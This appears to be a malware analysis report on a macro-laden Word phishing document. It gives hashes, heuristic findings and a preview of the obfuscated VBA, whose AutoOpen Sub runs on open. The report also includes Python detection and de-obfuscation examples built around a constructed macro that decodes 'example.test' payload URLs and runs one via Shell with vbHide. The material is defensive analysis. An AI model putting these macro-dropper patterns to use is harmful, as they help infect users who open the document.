Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2efe8c436b496540…

MALICIOUS

Office (OLE)

Size: 164.0 KB
Created: 2018-04-26 22:27:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: f4c3e4878dac89e6f484055ca568cba0
SHA-1: a4e06bd9d9f4901d019ca553369a37c170193482
SHA-256: 2efe8c436b4965409f87799ef8659482b79c9a9b6c25422376e89cd932fd4475
Risk score: 144

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying a VBA project (macros.bas, 50,202 bytes of decoded source). The critical OLE_VBA_SHELL heuristic indicates a Shell() call in the VBA code, the usual way a macro runs an arbitrary command or launches a downloaded second stage. The AutoOpen entry point (Sub Autoopen in the preview below) means the code runs as soon as the document is opened with macros enabled. In the visible listing that Sub starts with On Error Resume Next and, apart from Select Case blocks whose selector variables are never assigned (dead-code padding that also fills every other Sub), consists of a single call WkPIGTiLlw(LYtjHl + AcLKQCUTNzSNP + PbjoQX); none of those identifiers is defined in the visible part of the listing, so the Shell() call and the payload logic sit in the truncated remainder. The string 'http://www.ber' recovered by OLE_VBA_OBFUSCATED_URL passes the heuristic's syntactic host check but is a bare host fragment rather than a complete domain; treat it as a low-confidence IOC until the full de-obfuscated macro or a sandbox run confirms the payload URL. The second extracted URL, http://schemas.openxmlformats.org/drawingml/2006/main, is the standard DrawingML XML namespace URI and is not an indicator. Note also that the OLE_LEGACY_WORDBASIC_AUTOEXEC description states that no modern VBA project was recovered, which the extracted macros.bas contradicts; in this report that finding duplicates OLE_VBA_AUTOOPEN and adds no independent evidence.

Heuristics (6)

  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • URL de-obfuscated from VBA string literal (1 URL) [info] OLE_VBA_OBFUSCATED_URL
    A VBA macro hides its download URL inside a string literal that is de-obfuscated at runtime: junk digits or a Replace() junk token interleaved through the URL, or the URL stored reversed (StrReverse). The decoded host is the next-stage payload URL (URLDownloadToFile/XMLHTTP/ShellExecute); surfaced as an IOC. Self-validating: only a transform that yields a syntactically valid host URL is reported.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.ber (referenced by macro)
    URL http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro)
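The heuristics above are regex-level checks over the decoded VBA. The following is an added example, not the analysis platform's or oletools' own code, that re-implements them in Python: the auto-exec entry points behind OLE_VBA_AUTOOPEN, the execution primitives behind OLE_VBA_SHELL, and the three de-obfuscation transforms the OLE_VBA_OBFUSCATED_URL description lists (Replace() junk token, interleaved digits, StrReverse) with the same self-validation rule that only a transform yielding a syntactically valid host URL is reported. The regexes, finding labels and the SAMPLE_VBA input are this example's own assumptions; the sample is constructed and is not taken from the analysed document.

```python
# Added example: re-implements the OLE_VBA_* heuristics listed above over decoded
# VBA source. Not the analysis platform's or oletools' code; regexes, labels and
# SAMPLE_VBA are this example's assumptions.
import re
from urllib.parse import urlparse

# Constructed sample (not from the analysed document): one auto-exec Sub that
# hides its URLs the three ways the OLE_VBA_OBFUSCATED_URL description lists,
# plus a benign OOXML namespace URI that must be reported as a plain URL only.
SAMPLE_VBA = r'''
Attribute VB_Name = "Module1"
Sub Autoopen()
On Error Resume Next
u = Replace("h@@ttp://exam@@ple.test/pay@@load.exe", "@@", "")
v = StrReverse("exe.eno/tset.elpmaxe//:ptth")
w = "h7t2t9p://d3own1load.5exa8mple.te0st/s2.bin"
x = "http://schemas.openxmlformats.org/drawingml/2006/main"
Shell u, vbHide
End Sub
'''

# Entry points Office runs without a click once macros are enabled.
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+"
    r"(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Workbook_Open)\b",
    re.I | re.M)
# Execution / download primitives. 'Shell' is matched as a bare word because the
# statement form  Shell cmd, vbHide  (no parentheses) is as common as Shell(cmd).
EXEC_RE = re.compile(
    r"\b(Shell|ShellExecute|WScript\.Shell|URLDownloadToFile|XMLHTTP|CreateObject)\b",
    re.I)
PROC_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+\w+", re.I | re.M)
LIT_RE = re.compile(r'"([^"\n]{8,})"')                       # string literals worth testing
REPLACE_RE = re.compile(r'Replace\s*\(\s*"[^"]*"\s*,\s*"([^"]*)"\s*,\s*""\s*\)', re.I)
HOST_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.I)    # dotted host; TLD not checked


def valid_url(s):
    """Self-validation gate: a transform counts only if it yields a URL with an
    http/https/ftp scheme and a dotted hostname. Purely syntactic: it does not
    know whether the host resolves, so 'http://www.ber' passes too."""
    try:
        p = urlparse(s)
    except ValueError:
        return False
    return (p.scheme.lower() in ("http", "https", "ftp") and bool(p.hostname)
            and HOST_RE.match(p.hostname) is not None)


def candidate_transforms(lit, junk=None):
    """The transforms the heuristic tries; the plain literal goes first so a
    real URL is never mis-reported as obfuscated."""
    yield "plain", lit
    if junk:
        yield "replace-junk", lit.replace(junk, "")   # Replace(lit, junk, "")
    yield "strip-digits", re.sub(r"\d", "", lit)       # junk digits interleaved
    yield "strreverse", lit[::-1]                      # StrReverse(lit)


def deobfuscate_urls(src):
    """Return [(transform, url)] for every literal that decodes to a valid URL."""
    found = []
    for line in src.splitlines():
        m = REPLACE_RE.search(line)
        junk = m.group(1) if m else None
        for lit in LIT_RE.findall(line):
            for how, cand in candidate_transforms(lit, junk):
                if valid_url(cand):
                    if (how, cand) not in found:
                        found.append((how, cand))
                    break
    return found


def triage(src):
    """Map the source to the finding IDs and severities used in the report above."""
    findings = []
    if PROC_RE.search(src):
        findings.append(("OLE_VBA_MACROS", "medium"))
    autoexec = AUTOEXEC_RE.findall(src)
    if autoexec:
        findings.append(("OLE_VBA_AUTOOPEN", "high"))
    execs = sorted({m.group(1) for m in EXEC_RE.finditer(src)})
    if execs:
        findings.append(("OLE_VBA_SHELL", "critical"))
    urls = deobfuscate_urls(src)
    if any(how != "plain" for how, _ in urls):
        findings.append(("OLE_VBA_OBFUSCATED_URL", "info"))
    if urls:
        findings.append(("EMBEDDED_URL", "info"))
    return {"findings": findings, "autoexec": autoexec,
            "exec_primitives": execs, "urls": urls}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

Run as a script it prints the report-style findings for the sample. valid_url is deliberately syntactic, as the heuristic description says: it accepts http://www.ber as readily as a real domain, which is why the decoded host in this report needs confirmation from the full macro or a sandbox run before it is used as a blocking indicator. The benign OOXML namespace URI is reported as plain and never as de-obfuscated because the untouched literal is tested before any transform.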

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 50202 bytes
SHA-256: 5acf4bae256fc82637293638a683fef160e789afd6ddc70c71d90c841f8054b0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wimwrPXb"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AQQtI(BCCiht)
Select Case VnvsfA
         Case 75252
            IOvUp = Hex(usiZiG - ChrW(HfRtqt))
            VYuHz = CByte(64390)
            MiiWmL = rCUYSV
         Case 12415
            YEznq = HdwpH
            vjToU = Round(15956)
            iKzDw = Log(DPdwUX)
End Select
End Sub
Sub ILAqI(rMFEf)
Select Case inwHij
         Case 8552
            SXwYB = Hex(tmwdh - ChrW(RjQjjd))
            IRpdGU = CByte(43296)
            HFHvP = MEkNc
         Case 78372
            SEObW = PuWOY
            Bwtdu = Round(84935)
            ilmhq = Log(ROEfjW)
End Select
Select Case oZpMb
         Case 3699
            THWkqj = Hex(OTTbpV - ChrW(KUfXX))
            EmKPqs = CByte(32706)
            bGhBs = kXOCq
         Case 13048
            DulDqB = iFJoDI
            jwGtwS = Round(50976)
            NmawMn = Log(FdjRBB)
End Select
Select Case ZMAqhk
         Case 41360
            szjdDb = Hex(JroRQ - ChrW(wdtovs))
            jImHd = CByte(77810)
            usHkp = RucNj
         Case 68669
            zUocj = LaiGCl
            VPkLcA = Round(29514)
            NQkDb = Log(OEBjFM)
End Select
End Sub
Sub CLTJYs(wLmFzz)
Select Case CKQliU
         Case 14161
            EEZHlz = Hex(hawZK - ChrW(EQBDH))
            GBiiEi = CByte(5232)
            ukvWr = RHOjQG
         Case 60516
            dLJZmc = tOhbhA
            aaVdjk = Round(52077)
            fZhkBw = Log(RmAHf)
End Select
Select Case SVirZ
         Case 27869
            VNvKZ = Hex(jnOnXu - ChrW(jjjrB))
            Bqzuba = CByte(39948)
            HFqlJ = ZbRiX
         Case 21612
            PODwc = fqmln
            wNKYSU = Round(68570)
            XYiXC = Log(YaFOF)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case qIlbt
         Case 92008
            OpUVTD = Hex(LJPDwK - ChrW(Guqjfw))
            nElXj = CByte(37831)
            pbjiXV = PDCOU
         Case 14135
            PLCPu = kNuvOz
            akiwnj = Round(91665)
            hjYbo = Log(qrnSL)
End Select
WkPIGTiLlw (LYtjHl + AcLKQCUTNzSNP + PbjoQX)
Select Case viUEak
         Case 22470
            ifdoFM = Hex(WHcCKX - ChrW(qzrBv))
            uBsIEB = CByte(44862)
            Wjrad = qOFTjb
         Case 42728
            ZLNNP = oVNZpf
            jnVjDp = Round(63824)
            XlcjtM = Log(tYVUKp)
End Select
End Sub
Sub juqmiX(WRlzr)
Select Case bkjcl
         Case 78903
            BZljV = Hex(LboDUV - ChrW(FGbtQL))
            wBTqi = CByte(3100)
            AJoti = kaHIK
         Case 32738
            LZhNQc = DVIqLa
            GAFuzU = Round(56594)
            RzKmA = Log(fzSiz)
End Select
Select Case zYTFZ
         Case 12203
            zfAwi = Hex(pdZBO - ChrW(wUAIh))
            icjYW = CByte(81852)
            LNiij = UqMifQ
         Case 2125
            iKjFzE = DtwQm
            vibaJ = Round(19813)
            XuHvtB = Log(WkqVrj)
End Select
Select Case zRwTYm
         Case 74934
            UlRuz = Hex(MkDVG - ChrW(FkDoM))
            LwTCaZ = CByte(11003)
            wMfHlX = PaVdw
         Case 9161
            JzmAk = VPNHG
            booRKs = Round(78213)
            cAFvj = Log(GqJhLN)
End Select
End Sub
Sub roTPZo(FhwXBI)
Select Case PaJKkJ
         Case 68244
            JtrRBQ = Hex(Ffwslk - ChrW(VBlDFP))
            Biubmq = CByte(30065)
            XaDHz = aYInTa
         Case 54577
            aIWMP = HZjEU
            HLwqPZ = Round(31015)
            IWoik = Log(uccQm)
End Select
End Sub

Attribute VB_Name = "TiHmEabKtztzn"
Sub XOcSX(KYJETs)
Select Case vKfzQS
         Case 59944
            ZEJlpw = Hex(KLcpr - ChrW(wjzJts))
            uYCSLw = CByte(61044)
            NzdjI = wKSjiv
         Case 8359
           
... (truncated)
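The preview is dominated by Select Case blocks whose selectors (VnvsfA, qIlbt, viUEak, ...) are never assigned anywhere in the visible listing, so the numeric Case labels can never match and the bodies never run; they exist to inflate the module and dilute signatures. The following added example (not the analysis platform's or oletools' code) strips such blocks and lists what each Sub still does. Its dead-block rule, helper names and SAMPLE_MACRO, an abridged excerpt of the preview plus a constructed Sub Dispatch with a live Select Case on a parameter, are this example's own assumptions.

```python
# Added example: strips the dead Select Case padding seen in the macros.bas
# preview so the live statements of each Sub stand out. Not the platform's or
# oletools' code; the dead-block rule and SAMPLE_MACRO are assumptions.
import re
from collections import OrderedDict

# Abridged excerpt of the preview above (AQQtI, Autoopen) plus a constructed
# Sub Dispatch whose Select Case is live and must survive the stripping.
SAMPLE_MACRO = r'''
Attribute VB_Name = "wimwrPXb"
Sub AQQtI(BCCiht)
Select Case VnvsfA
         Case 75252
            IOvUp = Hex(usiZiG - ChrW(HfRtqt))
         Case 12415
            vjToU = Round(15956)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case qIlbt
         Case 92008
            OpUVTD = Hex(LJPDwK - ChrW(Guqjfw))
         Case 14135
            hjYbo = Log(qrnSL)
End Select
WkPIGTiLlw (LYtjHl + AcLKQCUTNzSNP + PbjoQX)
Select Case viUEak
         Case 22470
            ifdoFM = Hex(WHcCKX - ChrW(qzrBv))
End Select
End Sub
Sub Dispatch(mode)
Select Case mode
         Case 1
            Result = "one"
End Select
End Sub
'''

SUB_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(([^)]*)\)", re.I)
END_SUB_RE = re.compile(r"^\s*End\s+(?:Sub|Function)\b", re.I)
SELECT_RE = re.compile(r"^\s*Select\s+Case\s+(\w+)\s*$", re.I)
END_SELECT_RE = re.compile(r"^\s*End\s+Select\b", re.I)
CASE_RE = re.compile(r"^\s*Case\s+(.+?)\s*$", re.I)
ASSIGN_RE = re.compile(r"^\s*(?:Set\s+)?(\w+)\s*=", re.I)


def param_names(sig):
    """Parameter identifiers from 'ByVal a As Long, b'; a Select on one is live."""
    names = set()
    for p in sig.split(","):
        p = re.sub(r"^\s*(?:Optional\s+)?(?:ByVal|ByRef)?\s*", "", p, flags=re.I).strip()
        if p:
            names.add(re.match(r"\w+", p).group(0).lower())
    return names


def assigned_names(lines):
    """Identifiers that are ever the target of an assignment anywhere in the module."""
    return {m.group(1).lower() for ln in lines if (m := ASSIGN_RE.match(ln))}


def block_is_dead(selector, labels, params, assigned):
    """Dead padding: the selector is never assigned and is not a parameter, so it
    is an uninitialised Variant (Empty, which compares equal to 0), and every
    Case label is a non-zero integer literal that Empty can never equal."""
    s = selector.lower()
    if s in assigned or s in params or not labels:
        return False
    return all(re.fullmatch(r"-?\d+", lbl) and int(lbl) != 0 for lbl in labels)


def strip_dead_selects(src):
    """Return (stripped source, {sub name: [remaining statements]})."""
    lines = src.splitlines()
    assigned = assigned_names(lines)
    out, live = [], OrderedDict()
    current, params, i = None, set(), 0
    while i < len(lines):
        ln = lines[i]
        if (m := SUB_RE.match(ln)):
            current, params = m.group(1), param_names(m.group(2))
            live[current] = []
            out.append(ln); i += 1; continue
        if END_SUB_RE.match(ln):
            current, params = None, set()
            out.append(ln); i += 1; continue
        if (m := SELECT_RE.match(ln)):
            depth, j, labels = 0, i, []
            while j < len(lines):                        # locate the matching End Select
                if SELECT_RE.match(lines[j]):
                    depth += 1
                elif END_SELECT_RE.match(lines[j]):
                    depth -= 1
                    if depth == 0:
                        break
                elif depth == 1 and (c := CASE_RE.match(lines[j])):
                    labels.append(c.group(1))
                j += 1
            if not block_is_dead(m.group(1), labels, params, assigned):
                for k in range(i, j + 1):                # live block: keep verbatim
                    out.append(lines[k])
                    if current and lines[k].strip():
                        live[current].append(lines[k].strip())
            i = j + 1
            continue
        out.append(ln)
        if current and ln.strip():
            live[current].append(ln.strip())
        i += 1
    return "\n".join(out), live


def padding_subs(live):
    """Subs left with no statements at all: pure filler."""
    return [name for name, stmts in live.items() if not stmts]


if __name__ == "__main__":
    stripped, live = strip_dead_selects(SAMPLE_MACRO)
    print(stripped)
    print("filler subs:", padding_subs(live))
```

On the excerpt, AQQtI is left empty (pure filler), Autoopen reduces to On Error Resume Next followed by the WkPIGTiLlw(...) call, and Dispatch keeps its Select Case because the selector is a parameter. That surviving call, with three arguments that are undefined in the preview, is where analysis of the full 50 KB module should start; the same approach works on the complete extracted source because the rule only removes blocks that provably cannot execute.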